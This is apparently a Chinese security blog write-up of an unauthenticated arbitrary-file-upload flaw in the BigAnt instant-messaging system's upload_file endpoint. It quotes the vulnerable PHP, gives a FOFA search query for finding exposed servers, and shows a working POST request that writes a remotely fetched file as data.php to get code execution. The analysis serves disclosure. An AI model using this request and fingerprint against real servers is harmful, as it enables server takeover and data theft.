大蚂蚁 (BigAnt) 即时通讯系统 DispersedOrgController 任意文件上传漏洞


漏洞简介

杭州九麒科技大蚂蚁 (BigAnt) 即时通讯系统是一款企业级IM通信管理系统,提供多种功能支持。该系统的 DispersedOrgController upload_file 接口存在目录遍历+任意文件写入/上传漏洞,攻击者可以通过上传特制的 php 文件,执行恶意代码,实现服务器的远程控制,可能导致敏感信息泄露、数据篡改等危害。

影响版本

BigAnt 5.5.x 及以上版本用户

经过测试,最新版本 6.0.1.20250407.1 也受影响

fofa语法

(body="/Public/static/admin/admin_common.js" && body="/Public/lang/zh-cn.js.js") || title="即时通讯 系统登录" && body="/Public/static/ukey/Syunew3.js"

漏洞分析

直接看下 Application/Api/Controller/DispersedOrgController.class.php 的实现逻辑

先看下 _initialize 方法有没有鉴权,可以未授权访问,但是需要提供server_id

再看 upload_file() 方法的实现逻辑

public function upload_file(){
    $filePath = I("path");
    $group_id = I("group_id"); //如果带了group_id 说明是群头像更新
       $file_url = I("file_url"); //跨域间传输文件,因为环境导致需要以下载的形式传输

    if(!$filePath){
       Jump::errror("path 错误");
    }
    if(strpos($filePath,"data")===false){
       Jump::errror("path illegal");
    }
    $absolutePath = SITE_PATH."/".$filePath;
    LogWrite("获取上传文件的绝对路径:".$absolutePath);
    $dirname     = dirname($absolutePath);
    if(!is_dir($dirname)){
       if(!mkdir($dirname, 0777, true) && !is_dir($dirname)){
          Jump::errror(301,sprintf('Directory "%s" was not created', $dirname));
       }
    }
    if(is_file($absolutePath)){
       Jump::success("文件已经存在,无需上传");
    }

       $res = sp_download_img($file_url,$absolutePath);      //编译版本的php因为环境差异导致传入文件数组502,采用下载方式传输头像
       if($res===false){
           Jump::errror("头像上传失败");
       }
    //同步群消息
    if($group_id){
       \Common\Model\GroupModel::DD()->where(['group_id'=>$group_id])->save(['group_photo'=>$filePath]);
    }

    Jump::success("上传文件成功");
}

文件还是直接上传后保存,且保存路径由用户可控参数path==>$filePath==>$absolutePath = SITE_PATH."/".$filePath 为文件保存路径、文件名、类型以及后缀等,file_url参数为远程文件地址,

只需要满足path参数包含字符串data 即可通过如下校验部分

if(strpos($filePath,"data")===false){
    Jump::errror("path illegal");
}

$absolutePath被带入$res = sp_download_img($file_url,$absolutePath);方法,跟进看下它的实现逻辑

就是常规的使用curl进行文件下载保存,至此这个目录遍历+任意文件、内容写入/上传漏洞就清晰明了。

漏洞复现

需要注意thinkphp的路由特性,不区分大小写,且还支持如下等方式

/api/dispersedOrg/upload_file.html

/api/dispersedOrg/upload_file

POST /?m=api&c=dispersedOrg&a=upload_file HTTP/1.1
Host: bigant.mrxn.net
Content-Type: application/x-www-form-urlencoded

path=data.php&file_url=http://127.0.0.1:8001/data.txt&server_id=1

访问上传文件 data.php

成功执行我们上传的文件,并删除自身

img


手机扫码阅读

东胜物流软件 IPLimitController SQL注入漏洞

东胜物流软件 MsOpSeaeController 多个SQL注入漏洞

评 论